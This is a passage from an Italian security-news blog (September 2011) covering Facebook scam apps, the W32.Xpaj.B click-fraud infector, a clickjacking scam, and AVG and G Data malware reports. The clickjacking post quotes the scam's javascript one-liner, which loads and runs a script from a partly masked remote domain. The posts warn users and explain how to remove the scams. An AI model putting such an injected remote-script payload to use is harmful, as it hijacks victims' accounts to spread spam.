Applicazione scam: "possibile vedere chi guarda il tuo profilo Facebook"


Una nuova applicazione scam individuata da Protezione Account sta facendo il giro su Facebook e fornirebbe, a suo dire, la possibilità di scoprire chi visita il nostro profilo sul social network. Premesso - come già detto per altre applicazioni simili - che nessuno è in grado di fornire informazioni su chi guarda il profilo dell'utente Facebook, questa particolare applicazione ha lo scopo di indurre l'utente a sottoscrivere un abbonamento sul proprio telefonino. Il testo del post generato dalla falsa applicazione recita testualmente: "WOW! I just found this where cou can see who watches your profile ---> [LINK]" (WOW! Ho appena trovato questo dove è possibile vedere chi guarda il tuo profilo). Se clicchiamo sul link nascosto da uno short URL (URL accorciato), veniamo rimandati sulla pagina dell'applicazione:


Ci viene presentata la foto di un'ipotetica amica (sempre uguale per tutti i profili) e viene individuato il luogo dal quale ci collegghiamo per rendere più credibile l'applicazione (in realtà il dato è accessibile nelle nostre info). Se proseguiamo facendo click sul pulsante al centro , verremo rimandati alla pagina di permessi dell'applicazione scam

Se clicchiamo su "Consenti", l'applicazione potrà accedere al nostro nome, immagine del profilo, sesso, ID utente, lista degli amici e qualsiasi altra informazione per la quale la privacy è impostata su "Tutti". Inoltre l'applicazione potrà pubblicare messaggi di stato, note, foto e video sulla nostra bacheca, accedere ai post nella nostra sezione Notizie e accedere ai nostri dati in qualsiasi momento.


Ci verrà dunque presentata una finestra di dialogo dove saremo invitati a verificare che siamo utenti "veri" e non "bot automatici". Per far ciò dovremo scegliere fra tre prossibilità offerte dal menù. Se clicchiamo verremo rimandati alla pagina del "concorso".


Nel frattempo l'applicazione accederà ai nostri dati e a quelli degli amici. Pubblicherà sulla nostra bacheca per diffondere il post e ad ogni commento che invieremo sul social network aggiungerà il testo sopracitato. Se andiamo avanti con la procedura sottoscriveremo un abbonamento di 5 euro settimanali ad un quiz telematico sul nostro telefonino.

Uno dei siti segnalati  come pericolosi da McAfee Site Advisor

Inoltre rischierete di vedervi bloccato il profilo dal sistema automatico antispam di Facebook. Se siete caduti nella trappola potete rimuovere l'applicazione dalla vostra pagina della privacy / Applicazioni e siti Web / Rimuovi le applicazioni indesiderate o che inviano spam.


Anche Facebook ha emesso un comunicato ufficiale nel quale si legge: "Posso sapere chi sta visualizzando il mio profilo e con quale frequenza? No, Facebook non fornisce alcuna funzionalità che consenta di monitorare chi visualizza il tuo profilo, o parti di esso, come le foto. Anche applicazioni di terzi non sono in grado di fornire questa funzionalità. Le applicazioni che sostengono di offrire questa possibilità verranno rimosse da Facebook per violazione delle nostre politiche. Puoi segnalare le applicazioni ingannevoli seguendo le istruzioni illustrate qui". Prestate dunque sempre attenzione alle applicazioni che promettono "cose impossibili" e con l'occasione verificate quelle che attive sul vostro profilo, rimuovendo quelle sospette o che non utilizzate da molto tempo.

domenica 18 settembre 2011

Symantec scopre truffa attraverso clic fraud veicolata da file infector


I ricercatori di sicurezza di Symantec hanno scoperto una truffa attraverso clic fraudolenti con l'aiuto di un file infector sofisticato. I file infector sono tipologie di virus che infettano i file, modificandone la struttura interna in modo tale da essere eseguiti quando viene lanciata l'applicazione che li ospita. In realtà l'infector, chiamato W32.Xpaj.B, ha attirato l'attenzione degli analisti di malware per il suo complesso sistema tecncio di evasione. W32.Xpaj.B è uno degli agenti infettanti di file più complessi e sofisticati che Symantec abbia mai incontrato. Le tecniche che W32.Xpaj.B usa per nascondere se stesso all'interno di un eseguibile sono ben oltre la norma. Dato questo livello di complessità, Symantec ha deciso di analizzare la minaccia nei dettagli. W32.Xpaj.B infetta i file eseguibili su computer e unità di rete per poi interrogare il server di comando e controllo ogni volta che vengono eseguiti.


"W32.Xpaj.B è uno degli agenti infettanti di file più complessi e sofisticati che Symantec abbia rilevato. Il W32.Xpaj.B usa tecniche per nascondere se stesso all'interno di un eseguibile che vanno ben oltre la norma", fa notare in un post sul blog di sicurezza, Gavin O Gorman, analista di Symantec. L'analisi di Symantec ha rivelato gli indirizzi IP dei server per il comando e controllo (C & C). Gli eseguibili infetti da W32.Xpaj.B inviano una richiesta di download a questi server C & C. Analisi delle infrastrutture di controllo dei server-side hanno rivelato la minaccia più che i dati inviati dal server al client infetti. 

I server contengono dati binari cifrati, chiavi di cifratura, database e applicazioni web. Questi erano tutti gli elementi di quello che è emerso da un'operazione di frode che si è sviluppata su più computer ospitati in diversi paesi. Il reverse engineering dei dati binari, in collaborazione con l'analisi delle applicazioni Web, ha costruito l'immagine di un contorto sistema di click-fraud. Gli intricati dettagli di come la frode è stata attuata sono descritti nel documento tecnico associato, W32.Xpaj.B: Fare soldi facili da codice complesso [PDF]. 

Nel documento viene presentata una panoramica da cui si scopre quanto sia stata diffusa la minaccia e quanto denaro hanno guadagnato i truffatori. Nonostante che assomigli ad un uso generale dei downloader, W32.Xpaj.B è stato utilizzato solo come parte di questo schema click-fraud che dirotta legittime richieste dei motori di ricerca e restituisce carichi di risultati. L'infrastruttura a sostegno di questa operazione si estende su diversi paesi, ma a differenza del file infector, il codice lato server è ingenuo. Questo ha portato i ricercatori a credere che il dropper potrebbe essere stato acquistato da una terza parte.

La stessa truffa è simile a quella che recentemente ha portato sul motore di ricerca Google la visualizzazione di avvisi malware. Le ricerche sono passate attraverso una serie di deleghe e quando vengono restiutiti i risultati, sono accompagnate da annunci canaglia. I ricercatori di Symantec sono riusciti a decodificare il codice criptato e ottenere l'accesso alla "contabilità" back-end dei registri per quanto riguarda settembre 2010. L'esame di alcuni script automatici in esecuzione sul server, così come i nomi chiave crittografici, ha rivelato una mappa delle infrastrutture diffuse in diversi paesi. 


L'estratto mostra i dati che i truffatori hanno intercettato su una media di 241.000 ricerche al giorno fino a giugno di quest'anno, che ha prodotto un utile di 170 dollari al giorno. Prendendo in considerazione uno dei tre uomini che hanno operato dall'Ucraina , significa che ogni truffatore ha guadagnato più di 1.000 dollari al mese. Dato che lo stipendio medio lordo mensile in Ucraina è stato di 290 dollari nel 2010 e che le persone dietro a questa truffa hanno guadagnato tre volte tale cifra, non è difficile capire perché i cyber criminali sono così determinati. 

La quantità di soldi guadagnati in uno schema click-fraud schema dipende dal numero di clienti infetti e dal numero di ricerche e click eseguiti dai clienti. Sebbene il numero di clienti infetti, non è memorizzato nel database, il dtabase ha ancora memorizzati i file di log che erano stati caricati dal server C & C. L'elaborazione di questi file di log ha dato una registrazione del numero di connessioni uniche al giorno. Grazie ad alcuni registri delle connessioni IRC che erano presenti su uno dei server, è possibile ipotizzare l'identità della persona o delle persone dietro la truffa. Symantec sta lavorando con i fornitori dei più importanti hosting e altri vendor di sicurezza per garantire che questa infrastruttura maligna venga spenta.

Facebook scam: false anteprime video inducono ad azioni automatiche


Un nuovo attacco del tipo javasticking in lingua italiana è in atto da diverse ore su Facebook. Molti utenti stanno vedendosi letteralmente inondare la propria bacheca con miniature video che invitano alla visualizzazione di filmati dove si è protagonisti, in realtà inesistenti. L'invasione è del tipo "virale" da non confondere con "virus", anche se molti utenti e pagine confondono spesso questi termini, considerandoli la stessa cosa. 

Infatti ecco cosa leggiamo su Facebook: "ATTENZIONE A TUTTI...... sulle bacheche compaiono degli strani video con provenienza youtube...mandati da una persone di quelle che abbiamo tra le nostre amicizie con una frase che più o meno dice così...CIAO, come stai? ma dimmi (il vostro nome) sei proprio tu in questo video? ecco NON APRIRLO ASSOLUTAMENTE contiene un link ruba profilo e quindi addio anche alle pagine eliminarlo istantaneamente dalla bacheca!Copialo e incollato nella tua bacheca e passate parola.CONDIVIDETE E FATE GIRARE". 

In realtà non vi è alcun furto del profilo o di pagine, ma consiste "semplicemente" in una serie di comandi in javascript effettuate in maniera "quasi" automatica dall'utente che cade nella trappola. Si tratta di diversi post che contengono testi simili:

Ciao [nome] ma sei te in questo video!!
YouTube
www.facebook.com
[Nome] Pazzesco!! non posso credere che lo hai fatto davvero


Ciao [nome] ti hanno taggato in questo video?
YouTube
www.facebook.com
[Nome] Incredibile! Ma perche lo hai fatto


Ed inoltre:
Questa Ragazza deve essere pazza per aver fatto questo!
VIDE0
www.facebook.com
Cavolo ma le persone stanno proprio fuori! Ma come si fa a fare questa cosa!


Cominciano spiegando che i link "YouTube" e "VIDE0" non sono altro che collegamenti ipertestuali che riportano alla bacheca del profilo utente (http://www.facebook.com/profile.php?sk=wall). Se clicchiamo sulle false anteprime dei video, per coloro che hanno installato correttamente l'ultima versione di flash player, verrà visualizzato il seguente messaggio:

Controllo di sicurezza Facebook.
Per vedere il video segui i passaggi
Ci scusiamo per il disagio
Continue


Si tratta di una finestra di dialogo simile a quella che YouTube presenta quando il filmato non è disponibile nel paese dell'utilizzatore, quindi l'utente viene invitato a premere alcuni tasti in sequenza che nascondono istruzioni automatizzate.


Per prima cosa saremo invitati a selezionare l'URL presente sulla barra degli indirizzi, cliccare J (per cancellare l'URL) e dunque la combinazione di tasti CTRL + V. Con quest'ultima operazione incolleremo la seguente istruzione javascript: "(a=(b=document).createElement('script')).src='http://www.******saliensstreaming.com/tag/fb.php',b.body.appendChild(a);void(0)" e poi il tasto INVIO per confermare l'operazione. 

In realtà l'utente avrà eseguito una serie una serie di azioni come se fosse lui stesso a compierle. Tali azioni si limitano, per adesso, all'autopubblicazione dello stesso post nella bacheca propria e in quelle degli amici, in modo da diffondersi viralmente. Il sito collegato ai post è il seguente:


Al momento non abbiamo rilevato malware (virus) e molti di questi link sono già stati bloccati da Facebook. Nonostante ciò questo nuovo metodo è riuscito a bypassare il controllo per queste tipologie di truffe da parte del sistema automatico di Facebook. Ciò perchè in precedenza era stato settato al massimo livello ed ha fatto si che molte applicazioni fossero disattivate per errore da Facebook. 

Il consiglio è quello di rimuovere i post spam dalle vostre bacheche, passando il mouse in alto a destra del post e cliccando sulla X che appare. in questo modo potrete rimuovere sia il post che la preferenza alla pagina o applicazione. 

Se ciò non dovesse essere sufficiente, potete controllare l'eventuale preferenza data inconsapevolmente a pagine sconosciute, collegandovi http://www.facebook.com/editprofile.php?sk=activities e per verificare le applicazioni usate http://www.facebook.com/settings/?tab=applications. Informate i vostri amici e prestate attenzione prima di compiere qualsiasi azione "inusuale" sul social newtork, in special modo quando ricevete post o link dai vostri amici. Infatti nella stragrande maggioranza di queste tipologie di truffe è proprio l'amico ad essere veicolo inconsapevole.

sabato 17 settembre 2011

AVG: crimine informatico in aumento e più complesso, nuovi scenari


Dal nuovo Report il problema risiede nel “wetware”, vale a dire nel rapporto tra l’essere umano e le tecnologie. Per il futuro scenari inquietanti. A rischio la generazione Y. Commissionato dalla società di sicurezza Internet AVG Technologies, un nuovo Report rivela che il fenomeno globale del crimine informatico è in aumento, diventando sempre più complesso. Ciò è dovuto dal comportamento sorprendentemente compiacente dei giovani utenti che, così facendo, mettono a repentaglio la propria sicurezza. AVG ipotizza 5 scenari legati al cybercrime.

Il “wetware” è il vero colpevole
Realizzato dall’agenzia di ricerca The Future Laboratory, il report rivela che, mentre i criminali informatici e il malware diventano più sofisticati e difficili da scovare, gli utenti sono, in modo allarmante, sempre meno attenti a proteggere i loro dispositivi online. La combinazione di questi due fattori costituisce uno scenario potenzialmente pericoloso. Nell’indagine si riscontra anche che il fenomeno definito “wetware”, ovvero l’interazione tra il cervello umano e il software, è l'anello debole della catena. In realtà, il rischio crescente non deriva solo dalla tecnologia (software o hardware) ma sempre più dalle azioni umane (wetware). Un terzo degli europei intervistati da AVG e Future Poll, divisione di The Future Laboratory, dichiara di non aggiornare la propria protezione antivirus. Proprio per questo, cyber criminal si concentrano sempre più su come raggirare gli utenti piuttosto che i computer, inducendoli a scaricare malware come se fossero software attendibili. Questo consente loro di superare i normali controlli di sicurezza rendendo il “wetware” il vero punto debole del sistema.

I punti salienti del Report
  • La criminalità informatica risulta essere in aumento così come gli strumenti e le tattiche tipicamente utilizzate dagli hacker, ora in mano a bande criminali per monitorare macchine e reti attraverso frodi bancarie e furti d’identità.
  • Gli smartphone non sono più di semplici telefoni ma veri e propri mini Pc che i consumatori devono proteggere dal crimine informatico come dei normali computer. Per esempio, solo il 4% degli utenti internet e mobile francesi è attento ai virus che possono danneggiare gli smartphone. Infatti, il denaro può essere sottratto attraverso SMS fraudolenti inviati al consumatore inconsapevole.
  • Gli utenti sono coscienti della necessità di protezioni antivirus, ma quasi un intervistato su dieci non riesce a mantenere aggiornata la soluzione. E’ allarmante che proprio il gruppo di età compresa tra i 18 e i 35 anni, che dovrebbe avere più coscienza dei pericoli digitali, non sia sensibile alla problematica.
  • L’integrazione crescente di internet in sistemi fisici accresce in maniera esponenziale la vulnerabilità degli utenti nei confronti dei cyber-attack. Infatti, stiamo assistendo ad uno sviluppando sempre maggiore di ciò che è definito “Internet delle Cose”, ovvero sempre più oggetti funzionano tramite una connessione internet, che apre le porte agli hacker per creare nuovi virus.

Ipotizzati 5 possibili scenari
  1. Car-hacking - gli hacker potrebbero assumere il controllo della chiave elettronica, degli strumenti di bordo e persino dei freni di un’auto.
  2. Jailhouse Rocked - i detenuti potrebbero tentare l’evasione usando solo una penna USB.
  3. Health Scare - i sabotatori potrebbero minacciare anche le tecnologie legate al benessere e alla salute.
  4. Sniffer & blackouts - i ladri potrebbero monitorare i flussi di informazioni nei sistemi d’allarme domestici per riprogrammare le funzioni da remoto.
  5. Grid-Jacking - Truffatori e terroristi allo stesso modo potrebbero sfruttare la rete elettrica comune definita Smart Grid.



A rischio la generazione Y
Da quanto è emerso nel rapporto, gli utenti della generazione Y, quelli che sono cresciuti con la consapevolezza delle minacce digitali, sono anche i più temerari e scelgono di non utilizzare soluzioni antivirus. Per esempio, quasi la metà degli utenti inglesi nella fascia di età 18-35 anni non aggiorna il proprio software antivirus. Con questo tipo di comportamento gli utenti, che acquisteranno maggiore ricchezza e responsabilità con l’età, potranno portare a un grave sviluppo della criminalità informatica che potrà colpire non solo utenti privati ma anche aziende e pubbliche amministrazioni.

JR Smith, CEO di AVG Technologies, sottolinea: "il potenziale impatto del cyber-crimine non deve essere sottovalutato. Dopo la crisi finanziaria del 2008, l'OCSE ha cominciato a riesaminare i potenziali “global-shock”. Accanto alle classiche problematiche come la crisi finanziaria, le pandemie e i disordini sociali sono stati inclusi per la prima volta anche i rischi informatici. Il governo britannico ha stanziato, solo quest'anno, ben 63 milioni di sterline per combattere la criminalità informatica".

L'autore del report, il Dr. Antonia Ward di Future Laboratory, aggiunge: "E’ chiaro che i criminali informatici stanno diventando sempre più sofisticati, non solo nella loro programmazione, ma anche nei loro metodi. Il fatto che stanno passando dallo sfruttare le debolezze nel software ad attaccare il “wetware'” è un segnale molto forte e richiede una pronta risposta, puntando a migliorare la consapevolezza nelle persone di questa grave situazione in modo che non siano così facilmente ingannabili. " Conclude Smith "E’ sempre più evidente che ogni individuo senza protezione rende tutti più vulnerabili, quindi è vitale che una società globale trovi il modo per affrontare questa tendenza e garantisca una protezione totale. Vogliamo salvaguardare la vita digitale delle persone, o come ci piace dire: fornire tranquillità al mondo online". Report completo: http://www.avgbrasil.com.br/docs/2011_09_09_Future-Poll_Cybercrime_Futures.pdf

venerdì 16 settembre 2011

G Data pubblica il malware report sulle minacce per utenti Pc e mobili


I cyber criminali stanno sempre più focalizzandosi sui dispositivi mobili per distribuire malware. Una ricerca condotta dai G Data SecurityLabs mostra che la percentuale di malware per smartphone e tablet è cresciuta di quasi il 140% nella prima metà del 2011. In generale gli esperti osservano che i Trojan cross-platform stanno dominando il panorama del malware. Molti di questi sono progettati per favorire lo spamming o altre attività criminali tra le tanti presenti nel catalogo del cosiddetto eCrime. L’incremento nell’utilizzo di questi malware mostra che il mercato underground sta vivendo un vero e proprio boom. Nella prima metà dell’anno G Data ha registrato una nuova varietà di malware in media ogni 12 secondi. E non c’è nessuna fine in vista per questa ondata.

“Con i mobile malware i cyber criminali hanno scoperto un nuovo modello di business”, spiega Ralf Benzmüller, Responsabile dei G Data SecurityLabs. ”Al momento i criminali utilizzano soprattutto backdoor, programmi spia e costosi servizi di SMS per danneggiare le loro vittime. Anche se questo particolare segmento del mercato underground è ancora in fase di organizzazione, possiamo già evidenziare un enorme e potenziale rischio per i dispositivi mobili e i loro utenti. Ci aspettiamo pertanto un’ulteriore crescita nel settore dei mobile malware nella seconda metà dell’anno”.

I malware crescono ancora
I G Data SecurityLabs hanno registrato un nuovo record nella prima metà del 2011 con 1.245.403 nuovi programmi malware per computer. Una crescita del 15.7% in confronto alla seconda metà del 2010. Gli esperti di sicurezza si aspettano che questa crescita continui anche nei prossimi sei mesi. Entro la fine dell’anno si attendono per lo meno 2.5 milioni di nuove varietà di malware. Se lo scenario mostra una crescita più rilevante, si potrebbe addirittura superare la somma de malware diffusi tra il 2006 e il 2009.


I Trojan dominano ancora le categorie individuali. Questa crescita mostra che il business del cyber crime va a gonfie vele dal momento che include malware in grado di attivare l’esecuzione di servizi criminali come gli attacchi overload. Anche l’adware sta crescendo mentre il numero di backdoor e downloader ha subito una leggera flessione.

Il mobile malware si sta espandendo
Dal momento che gli smartphone e i tablet con sistema operativo Android stanno diventando sempre più popolari, i cyber criminali fanno sempre più affidamento sui dispositivi mobili per distribuire malware. Paragonato al precedente periodo, la percentuale di mobile malware è cresciuta di 3.7 volte. Per la seconda metà del 2011 gli esperti dei G Data SecurityLabs si aspettano un’ulteriore crescita al riguardo.

Due esempi di codici maligni per Android
L’app manipolata chiamata Zsone è stata diffusa attraverso il Google Android Market. Questo Trojan manda segretamente i dati di iscrizione a costosi numeri SMS cinesi. Poiché viene anche intercettata la conferma della registrazione, gli utenti possono scoprire questa truffa solo controllando la propria bolletta.

Le funzionalità di NickiBot includono la possibilità di spiare le sue vittime. Una variante del malware chiamato Google++, è disponibile come applicazione per il social network Google+ e registra rumori di background e chiamate. Il malware utilizza un sito per mandare queste informazioni, tra i cui i dati del tracciamento GPS, a chi ha condotto l’attacco. Questo consente ai criminali di accedere alle informazioni personali e determinare dove l’utente si trovi in qualsiasi momento.

AV-TEST
E' sempre più importante trovare un sistema efficace per proteggersi dagli attacchi hacker e dai malware. AV-TEST ha verificato e certificato quali soluzioni rispondono a questi requisiti e ha esaminato 22 diverse suite per la sicurezza. I programmi per la sicurezza IT che hanno rispettato gli elevate standard di AV-TEST ricevono un certificato che può essere mostrato sul pack del prodotto e nelle descrizioni online.  Complessi scenari di test sono utilizzati per analizzare il livello di protezione offerto dai programmi che devono dimostrare la loro efficacia individuando tutti i malware rilevanti alla data del test. Il test ha analizzato la protezione contro i malware, le performance di riparazione e la semplicità d’ uso per l’utente. Mentre per sei suite non hanno passato il test, G Data InternetSecurity 2012 ha dimostrato il suo elevatissimo livello di sicurezza e ha ottenuto per la quinta volta consecutiva la certificazione AV-TEST.